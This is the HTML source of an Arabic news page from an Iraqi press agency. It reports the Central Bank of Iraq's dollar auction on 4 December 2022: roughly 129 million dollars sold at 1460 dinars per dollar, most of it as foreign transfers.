	<!DOCTYPE html>
		<!--[if IE 8]>
	<html class="ie ie8" dir="rtl" lang="ar"> <![endif]-->
	<!--[if IE 9]>
	<html class="ie ie9" dir="rtl" lang="ar"> <![endif]-->
	<!--[if gt IE 9]><!-->
<html dir="rtl" lang="ar"> <!--<![endif]-->
	<head>
				<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="pingback" href="https://mustaqila.com/xmlrpc.php"/>

		
<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO Premium plugin v19.5 (Yoast SEO v19.11) - https://yoast.com/wordpress/plugins/seo/ -->
	<title>المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو 130 مليون | وكالة الصحافة المستقلة</title>
	<link rel="canonical" href="https://mustaqila.com/المركزي-العراقي-ارتفاع-مبيعات-الحوال/" />
	<meta property="og:locale" content="ar_AR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو 130 مليون" />
	<meta property="og:description" content="المستقلة /- ارتفعت مبيعات البنك المركزي العراقي من الدولار للحوالات الخارجية، يوم الأحد، نحو 130 مليون دولار في مزاد اليوم بمشاركة 31 مصرفا. أن &#8220;البنك المركزي باع اليوم خلال مزاده لبيع وشراء الدولار الامريكي، 129 مليونا و 301 الفا و 909 دولارا، غطاها البنك بسعر صرف اساس بلغ 1460 ديناراً لكل دولار. ان 81% من [&hellip;]" />
	<meta property="og:url" content="https://mustaqila.com/المركزي-العراقي-ارتفاع-مبيعات-الحوال/" />
	<meta property="og:site_name" content="وكالة الصحافة المستقلة" />
	<meta property="article:publisher" content="https://facebook.com/mustaqila" />
	<meta property="article:published_time" content="2022-12-04T11:50:14+00:00" />
	<meta property="og:image" content="https://www.mustaqila.com/wp-content/uploads/?i=/2022/08/البنك-المركزي-العراقــي.jpeg" />
	<meta property="og:image:width" content="1033" />
	<meta property="og:image:height" content="625" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="author" content="Abdulmalk" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@mustaqila_iq" />
	<meta name="twitter:site" content="@mustaqila_iq" />
	<meta name="twitter:label1" content="كُتب بواسطة" />
	<meta name="twitter:data1" content="Abdulmalk" />
	<meta name="twitter:label2" content="وقت القراءة المُقدّر" />
	<meta name="twitter:data2" content="دقيقة واحدة" />
	
	<!-- / Yoast SEO Premium plugin. -->


<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel="alternate" type="application/rss+xml" title="وكالة الصحافة المستقلة &laquo; الخلاصة" href="https://mustaqila.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="وكالة الصحافة المستقلة &laquo; خلاصة التعليقات" href="https://mustaqila.com/comments/feed/" />

<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-rtl-css' href='https://c0.wp.com/c/6.1.1/wp-includes/css/dist/block-library/style-rtl.min.css' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.1.1/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.1.1/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='classic-theme-styles-css' href='https://c0.wp.com/c/6.1.1/wp-includes/css/classic-themes.min.css' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link crossorigin="anonymous" rel='stylesheet' id='better-framework-main-fonts-css' href='https://fonts.googleapis.com/css?family=Lato:700,400%7CRoboto:400,500,900,700,400italic&#038;display=swap' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-rtl-css' href='https://c0.wp.com/p/jetpack/11.5.1/css/jetpack-rtl.css' type='text/css' media='all' />


<!--[if lt IE 9]>
<script data-jetpack-boost="ignore" type='text/javascript' src='https://mustaqila.com/wp-content/plugins/better-adsmanager/includes/libs/better-framework/assets/js/html5shiv.min.js?ver=3.15.0' id='bf-html5shiv-js'></script>
<![endif]-->
<!--[if lt IE 9]>
<script data-jetpack-boost="ignore" type='text/javascript' src='https://mustaqila.com/wp-content/plugins/better-adsmanager/includes/libs/better-framework/assets/js/respond.min.js?ver=3.15.0' id='bf-respond-js'></script>
<![endif]-->
<link rel="https://api.w.org/" href="https://mustaqila.com/wp-json/" /><link rel="alternate" type="application/json" href="https://mustaqila.com/wp-json/wp/v2/posts/522914" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://mustaqila.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://mustaqila.com/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 6.1.1" />
<link rel='shortlink' href='https://wp.me/p3Hg40-2c26' />
<link rel="alternate" type="application/json+oembed" href="https://mustaqila.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmustaqila.com%2F%25d8%25a7%25d9%2584%25d9%2585%25d8%25b1%25d9%2583%25d8%25b2%25d9%258a-%25d8%25a7%25d9%2584%25d8%25b9%25d8%25b1%25d8%25a7%25d9%2582%25d9%258a-%25d8%25a7%25d8%25b1%25d8%25aa%25d9%2581%25d8%25a7%25d8%25b9-%25d9%2585%25d8%25a8%25d9%258a%25d8%25b9%25d8%25a7%25d8%25aa-%25d8%25a7%25d9%2584%25d8%25ad%25d9%2588%25d8%25a7%25d9%2584%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://mustaqila.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmustaqila.com%2F%25d8%25a7%25d9%2584%25d9%2585%25d8%25b1%25d9%2583%25d8%25b2%25d9%258a-%25d8%25a7%25d9%2584%25d8%25b9%25d8%25b1%25d8%25a7%25d9%2582%25d9%258a-%25d8%25a7%25d8%25b1%25d8%25aa%25d9%2581%25d8%25a7%25d8%25b9-%25d9%2585%25d8%25a8%25d9%258a%25d8%25b9%25d8%25a7%25d8%25aa-%25d8%25a7%25d9%2584%25d8%25ad%25d9%2588%25d8%25a7%25d9%2584%2F&#038;format=xml" />
	<style>img#wpstats{display:none}</style>
		<meta name="google-site-verification" content="ZbTz3E0xb_Z6btbxbLTXl9vTmNeZCEfLaVwaiJX79bA" />
<meta name="google-site-verification" content="iYtF6fjzHElEQSOlP8DFOs--h_sQBINu4YeAEbhV5Q8" /
			<link rel="shortcut icon" href="https://i68.servimg.com/u/f68/11/87/36/37/favico10.png"><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<link rel="amphtml" href="https://mustaqila.com/%D8%A7%D9%84%D9%85%D8%B1%D9%83%D8%B2%D9%8A-%D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%D9%8A-%D8%A7%D8%B1%D8%AA%D9%81%D8%A7%D8%B9-%D9%85%D8%A8%D9%8A%D8%B9%D8%A7%D8%AA-%D8%A7%D9%84%D8%AD%D9%88%D8%A7%D9%84/amp/">


<style>#amp-mobile-version-switcher{position:absolute;right:0;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{text-decoration:underline}</style><link rel="alternate" type="text/html" media="only screen and (max-width: 640px)" href="https://mustaqila.com/%D8%A7%D9%84%D9%85%D8%B1%D9%83%D8%B2%D9%8A-%D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%D9%8A-%D8%A7%D8%B1%D8%AA%D9%81%D8%A7%D8%B9-%D9%85%D8%A8%D9%8A%D8%B9%D8%A7%D8%AA-%D8%A7%D9%84%D8%AD%D9%88%D8%A7%D9%84/amp/"><link rel='stylesheet' id='bf-minifed-css-1' href='https://mustaqila.com/wp-content/bs-booster-cache/1f0bf9ed83a183ddfdaaf6e605afb307.css' type='text/css' media='all' />
<link rel='stylesheet' id='7.7.0-1670156958' href='https://mustaqila.com/wp-content/bs-booster-cache/e40db57636c139b6c49875563a1383a6.css' type='text/css' media='all' />
<link rel="icon" href="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=32%2C32&#038;ssl=1" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=192%2C192&#038;ssl=1" sizes="192x192" />
<link rel="apple-touch-icon" href="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=180%2C180&#038;ssl=1" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=270%2C270&#038;ssl=1" />

<!-- BetterFramework Head Inline CSS -->
<style>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</style>
<!-- /BetterFramework Head Inline CSS-->
<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>	</head>

<body class="rtl post-template-default single single-post postid-522914 single-format-standard bs-theme bs-publisher bs-publisher-clean-magazine active-light-box close-rh page-layout-2-col-right full-width active-sticky-sidebar active-ajax-search single-cat-16487 single-prim-cat-83 single-cat-83 single-cat-46 single-cat-82  bs-hide-ha wpb-js-composer js-comp-ver-6.7.0 vc_responsive bs-ll-a" dir="rtl">
	<header id="header" class="site-header header-style-2 full-width" itemscope="itemscope" itemtype="https://schema.org/WPHeader">

		<section class="topbar topbar-style-1 hidden-xs hidden-xs">
	<div class="content-wrap">
		<div class="container">
			<div class="topbar-inner clearfix">

									<div class="section-links">
								<div  class="  better-studio-shortcode bsc-clearfix better-social-counter style-button not-colored in-4-col">
						<ul class="social-list bsc-clearfix"><li class="social-item facebook"><a href = "https://www.facebook.com/mustaqila" target = "_blank" > <i class="item-icon bsfi-facebook" ></i><span class="item-title" > فيسبوك </span> </a> </li> <li class="social-item twitter"><a href = "https://twitter.com/mustaqilaiq" target = "_blank" > <i class="item-icon bsfi-twitter" ></i><span class="item-title" > تويتر </span> </a> </li> <li class="social-item youtube"><a href = "https://youtube.com/channel/UC6CvPPPPwsUYHxrXbSpejzA" target = "_blank" > <i class="item-icon bsfi-youtube" ></i><span class="item-title" > يوتيوب </span> </a> </li> <li class="social-item instagram"><a href = "https://instagram.com/mustaqila_iq" target = "_blank" > <i class="item-icon bsfi-instagram" ></i><span class="item-title" > الانستاجرام </span> </a> </li> <li class="social-item rss"><a href = "https://mustaqila.com/feed/rss/" target = "_blank" > <i class="item-icon bsfi-rss" ></i><span class="item-title" > متابعة </span> </a> </li> 			</ul>
		</div>
							</div>
				
				<div class="section-menu">
						<div id="menu-top" class="menu top-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
		<nav class="top-menu-container">

			<ul id="top-navigation" class="top-menu menu clearfix bsm-pure">
									<li id="topbar-date" class="menu-item menu-item-date">
					<span
						class="topbar-date">الأحد, ديسمبر 4, 2022</span>
					</li>
					<li id="menu-item-351809" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy better-anim-fade menu-item-351809"><a href="https://mustaqila.com/privacypolicy/">سياسة الخصوصية</a></li>
<li id="menu-item-324301" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-324301"><a href="https://mustaqila.com/%d8%b9%d9%86-%d8%a7%d9%84%d9%88%d9%83%d8%a7%d9%84%d8%a9/">عن الوكالة</a></li>
<li id="menu-item-324300" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-324300"><a href="https://mustaqila.com/%d8%a7%d8%b1%d8%b3%d9%84-%d8%ae%d8%a8%d8%b1%d8%a7/">ارسل خبر او مقال</a></li>
<li id="menu-item-324302" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-324302"><a href="https://mustaqila.com/%d8%a7%d8%aa%d8%b5%d9%84-%d8%a8%d9%86%d8%a7/">اتصل بنا</a></li>
			</ul>

		</nav>
	</div>
				</div>
			</div>
		</div>
	</div>
</section>
		<div class="header-inner">
			<div class="content-wrap">
				<div class="container">
					<div class="row">
						<div class="row-height">
							<div class="logo-col col-xs-4">
								<div class="col-inside">
									<div id="site-branding" class="site-branding">
	<p  id="site-title" class="logo h1 img-logo">
	<a href="https://mustaqila.com/" itemprop="url" rel="home">
					<img id="site-logo" src="https://www.mustaqila.com/wp-content/uploads/2021/02/mustaqila_logo.png"
			     alt="وكالة الصحافة المستقلة"  />

			<span class="site-title">وكالة الصحافة المستقلة - اخبار العراق - سياسة - مال واعمال - اخبار فنية</span>
				</a>
</p>
</div><!-- .site-branding -->
								</div>
							</div>
															<div class="sidebar-col col-xs-8">
									<div class="col-inside">
										<aside id="sidebar" class="sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
											<div class="tqysxwz tqysxwz-pubadban tqysxwz-show-desktop tqysxwz-loc-header_aside_logo tqysxwz-align-right tqysxwz-column-1 tqysxwz-hide-on-phone tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape tqysxwz-clearfix no-bg-box-model"><div id="tqysxwz-324247-1195523704" class="tqysxwz-container tqysxwz-type-code  tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape tqysxwz-hide-on-phone" itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="324247" data-type="code"><div id="tqysxwz-324247-1195523704-place"></div></div></div>										</aside>
									</div>
								</div>
														</div>
					</div>
				</div>
			</div>
		</div>

		<div id="menu-main" class="menu main-menu-wrapper show-search-item menu-actions-btn-width-1" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
	<div class="main-menu-inner">
		<div class="content-wrap">
			<div class="container">

				<nav class="main-menu-container">
					<ul id="main-navigation" class="main-menu menu bsm-pure clearfix">
						<li id="menu-item-326611" class="menu-item menu-item-type-custom menu-item-object-custom better-anim-fade menu-item-326611"><a href="https://www.mustaqila.com/latest">كل الاخبار</a></li>
<li id="menu-item-210152" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-34 better-anim-fade menu-item-210152"><a href="https://mustaqila.com/political/">سياسية</a></li>
<li id="menu-item-210148" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-46 better-anim-fade menu-item-210148"><a href="https://mustaqila.com/economy/">اقتصادية</a></li>
<li id="menu-item-210149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-31 better-anim-fade menu-item-210149"><a href="https://mustaqila.com/security/">امنية</a></li>
<li id="menu-item-210151" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1055 better-anim-fade menu-item-210151"><a href="https://mustaqila.com/sport/">رياضية</a></li>
<li id="menu-item-210153" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-210153"><a href="https://mustaqila.com/health/">صحة</a></li>
<li id="menu-item-210150" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-907 better-anim-fade menu-item-210150"><a href="https://mustaqila.com/arts/">فن</a></li>
<li id="menu-item-210154" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-7 better-anim-fade menu-item-210154"><a href="https://mustaqila.com/general/">منوعات</a></li>
<li id="menu-item-210156" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-8 better-anim-fade menu-item-210156"><a href="https://mustaqila.com/international/">عربي و دولي</a>
<ul class="sub-menu">
	<li id="menu-item-210157" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-33 better-anim-fade menu-item-210157"><a href="https://mustaqila.com/international/world/">دولي</a></li>
	<li id="menu-item-210158" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-37 better-anim-fade menu-item-210158"><a href="https://mustaqila.com/international/arab-news/">عربي</a></li>
</ul>
</li>
<li id="menu-item-210159" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9 better-anim-fade menu-item-210159"><a href="https://mustaqila.com/technology/">علوم و تكنولوجيا</a></li>
<li id="menu-item-210160" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-30 better-anim-fade menu-item-210160"><a href="https://mustaqila.com/articles/">مقالات</a></li>
<li id="menu-item-405729" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children better-anim-fade menu-item-405729"><a href="#">حسب الدول</a>
<ul class="sub-menu">
	<li id="menu-item-407192" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-16487 better-anim-fade menu-item-407192"><a href="https://mustaqila.com/iq/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/iraq-1.png"></i>اخبار العراق</a></li>
	<li id="menu-item-467764" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-23821 better-anim-fade menu-item-467764"><a href="https://mustaqila.com/palestine/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/05/palestine.png"></i>اخبار فلسطين</a></li>
	<li id="menu-item-440480" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-17579 better-anim-fade menu-item-440480"><a href="https://mustaqila.com/egy/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/11/egypt.png"></i>اخبار مصر</a></li>
	<li id="menu-item-444502" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-20280 better-anim-fade menu-item-444502"><a href="https://mustaqila.com/ksa/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/02/saudi-arabia.png"></i>اخبار السعودية</a></li>
	<li id="menu-item-453695" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-21593 better-anim-fade menu-item-453695"><a href="https://mustaqila.com/jordan/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/jordan.png"></i>اخبار الاردن</a></li>
	<li id="menu-item-497367" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-26210 better-anim-fade menu-item-497367"><a href="https://mustaqila.com/%d8%a7%d8%ae%d8%a8%d8%a7%d8%b1-%d9%82%d8%b7%d8%b1/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/01/qater.png"></i>اخبار قطر</a></li>
</ul>
</li>
					</ul><!-- #main-navigation -->
											<div class="menu-action-buttons width-1">
															<div class="search-container close">
									<span class="search-handler"><i class="fa fa-search"></i></span>

									<div class="search-box clearfix">
										<form role="search" method="get" class="search-form clearfix" action="https://mustaqila.com">
	<input type="search" class="search-field"
	       placeholder="بحث..."
	       value="" name="s"
	       title="البحث عن:"
	       autocomplete="off">
	<input type="submit" class="search-submit" value="بحث">
</form><!-- .search-form -->
									</div>
								</div>
														</div>
										</nav><!-- .main-menu-container -->

			</div>
		</div>
	</div>
</div><!-- .menu -->
	</header><!-- .header -->
	<div class="rh-header clearfix dark deferred-block-exclude">
		<div class="rh-container clearfix">

			<div class="menu-container close">
				<span class="menu-handler"><span class="lines"></span></span>
			</div><!-- .menu-container -->

			<div class="logo-container rh-img-logo">
				<a href="https://mustaqila.com/" itemprop="url" rel="home">
											<img src="https://i68.servimg.com/u/f68/11/87/36/37/logo_m12.png"
						     alt="وكالة الصحافة المستقلة"  />				</a>
			</div><!-- .logo-container -->
		</div><!-- .rh-container -->
	</div><!-- .rh-header -->
		<div class="main-wrap content-main-wrap">
		<nav role="navigation" aria-label="Breadcrumbs" class="bf-breadcrumb clearfix bc-top-style"><div class="container bf-breadcrumb-container"><ul class="bf-breadcrumb-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="3" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="bf-breadcrumb-item bf-breadcrumb-begin"><a itemprop="item" href="https://mustaqila.com" rel="home"><span itemprop="name">الصفحة الرئيسية</span></a><meta itemprop="position" content="1" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="bf-breadcrumb-item"><a itemprop="item" href="https://mustaqila.com/last/" ><span itemprop="name">اخر الاخبار</span></a><meta itemprop="position" content="2" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="bf-breadcrumb-item bf-breadcrumb-end"><span itemprop="name">المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون</span><meta itemprop="item" content="https://mustaqila.com/%d8%a7%d9%84%d9%85%d8%b1%d9%83%d8%b2%d9%8a-%d8%a7%d9%84%d8%b9%d8%b1%d8%a7%d9%82%d9%8a-%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d9%85%d8%a8%d9%8a%d8%b9%d8%a7%d8%aa-%d8%a7%d9%84%d8%ad%d9%88%d8%a7%d9%84/"/><meta itemprop="position" content="3" /></li></ul></div></nav><div class="container adcontainer"><div class="tqysxwz tqysxwz-after-header tqysxwz-pubadban tqysxwz-show-phone tqysxwz-loc-header_after tqysxwz-align-center tqysxwz-column-1 tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape tqysxwz-hide-on-desktop tqysxwz-clearfix no-bg-box-model"><div id="tqysxwz-379834-490795737" class="tqysxwz-container tqysxwz-type-custom_code  tqysxwz-hide-on-desktop tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape" itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="379834" data-type="custom_code"> <td class="alt2">
 
 </td> 

</div></div></div><div class="content-wrap">
		<main id="content" class="content-container">

		<div class="container layout-2-col layout-2-col-1 layout-right-sidebar layout-bc-before post-template-11">

			<div class="row main-section">
										<div class="col-sm-8 content-column">
							<div class="single-container">
																<article id="post-522914" class="post-522914 post type-post status-publish format-standard has-post-thumbnail  category-iq category-last category-economy category-main-2 single-post-content">
									<div
											class="post-header post-tp-11-header bs-lazy wfi"  title="المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/08/البنك-المركزي-العراقــي-750x430.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/08\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a-210x136.jpeg&quot;,&quot;279&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a-279x220.jpeg&quot;,&quot;357&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a-357x210.jpeg&quot;,&quot;750&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a-750x430.jpeg&quot;,&quot;1033&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a.jpeg&quot;}}">
										<div class="post-header-inner">
											<div class="post-header-title">
																								<h1 class="single-post-title">
													<span class="post-title" itemprop="headline">المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون</span>
												</h1>
												<div class="post-meta single-post-meta">
				<span class="time"><time class="post-published updated"
			                         datetime="2022-12-04T14:50:14+03:00">في <b>ديسمبر 4, 2022</b></time></span>
			</div>
											</div>
										</div>
																			</div>
																		<div class="entry-content clearfix single-post-content">
										<p><strong>المستقلة /- ارتفعت مبيعات البنك المركزي العراقي من الدولار للحوالات الخارجية، يوم الأحد، نحو 130 مليون دولار في مزاد اليوم بمشاركة 31 مصرفا.</strong></p>
 <p>أن &#8220;البنك المركزي باع اليوم خلال مزاده لبيع وشراء الدولار الامريكي، 129 مليونا و 301 الفا و 909 دولارا، غطاها البنك بسعر صرف اساس بلغ 1460 ديناراً لكل دولار.</p>
<div class="tqysxwz tqysxwz-post-middle tqysxwz-float-center tqysxwz-align-center tqysxwz-column-1 tqysxwz-clearfix no-bg-box-model"><div id="tqysxwz-325193-1514428735" class="tqysxwz-container tqysxwz-type-code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="325193" data-type="code"><div id="tqysxwz-325193-1514428735-place" class="tqysxwz-ll"></div></div></div> <p>ان 81% من المبيعات ذهبت لتعزيز الارصدة في الخارج على شكل حوالات واعتمادات حيث بلغت 108 ملايين و351 ألفاً و 909 دولارات، فيما ذهبت البقية على شكل مبيعات نقدية التي بلغت 20 مليونا و950 دولارا.</p>
 <p>إلى ان 18 مصرفا قامت بتلبية طلبات تعزيز الارصدة في الخارج، و13 مصرفا لتلبية الطلبات النقدية، إضافة الى 113 شركة وساطة مالية.</p> 									</div>
											<div class="post-share single-post-share bottom-share clearfix style-4">
			<div class="post-share-btn-group">
							</div>
						<div class="share-handler-wrap ">
				<span class="share-handler post-share-btn rank-default">
					<i class="bf-icon  fa fa-share-alt"></i>						<b class="text">شارك الخبر</b>
										</span>
				<span class="social-item whatsapp has-title"><a href="whatsapp://send?text=المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون %0A%0A https%3A%2F%2Fwp.me%2Fp3Hg40-2c26" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-whatsapp','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-whatsapp"></i></span><span class="item-title">WhatsApp</span></a></span><span class="social-item telegram has-title"><a href="https://telegram.me/share/url?url=https%3A%2F%2Fwp.me%2Fp3Hg40-2c26&text=المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-telegram','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-send"></i></span><span class="item-title">Telegram</span></a></span><span class="social-item viber has-title"><a href="viber://forward?text=المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون https%3A%2F%2Fwp.me%2Fp3Hg40-2c26" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-viber','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon bsfi-viber"></i></span><span class="item-title">Viber</span></a></span><span class="social-item facebook has-title"><a href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwp.me%2Fp3Hg40-2c26" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-facebook','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-facebook"></i></span><span class="item-title">Facebook</span></a></span><span class="social-item twitter has-title"><a href="https://twitter.com/share?text=المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون @mustaqilaiq&url=https%3A%2F%2Fwp.me%2Fp3Hg40-2c26" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-twitter','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-twitter"></i></span><span class="item-title">Twitter</span></a></span></div>		</div>
										</article>
									<section class="next-prev-post clearfix">

					<div class="prev-post">
				<p class="pre-title heading-typo"><i
							class="fa fa-arrow-right"></i> المقال السابق				</p>
				<p class="title heading-typo"><a href="https://mustaqila.com/b-21-%d8%a7%d8%ad%d8%af%d8%ab-%d9%82%d8%a7%d8%b0%d9%81%d8%a9-%d9%82%d9%86%d8%a7%d8%a8%d9%84-%d9%86%d9%88%d9%88%d9%8a%d8%a9-%d8%aa%d9%83%d8%b4%d9%81-%d8%b9%d9%86%d9%87%d8%a7-%d8%a7%d9%84/" rel="prev">&#8220;B-21&#8221;  احدث قاذفة قنابل نووية تكشف عنها البنتاغون</a></p>
			</div>
		
					<div class="next-post">
				<p class="pre-title heading-typo">المقال التالي <i
							class="fa fa-arrow-left"></i></p>
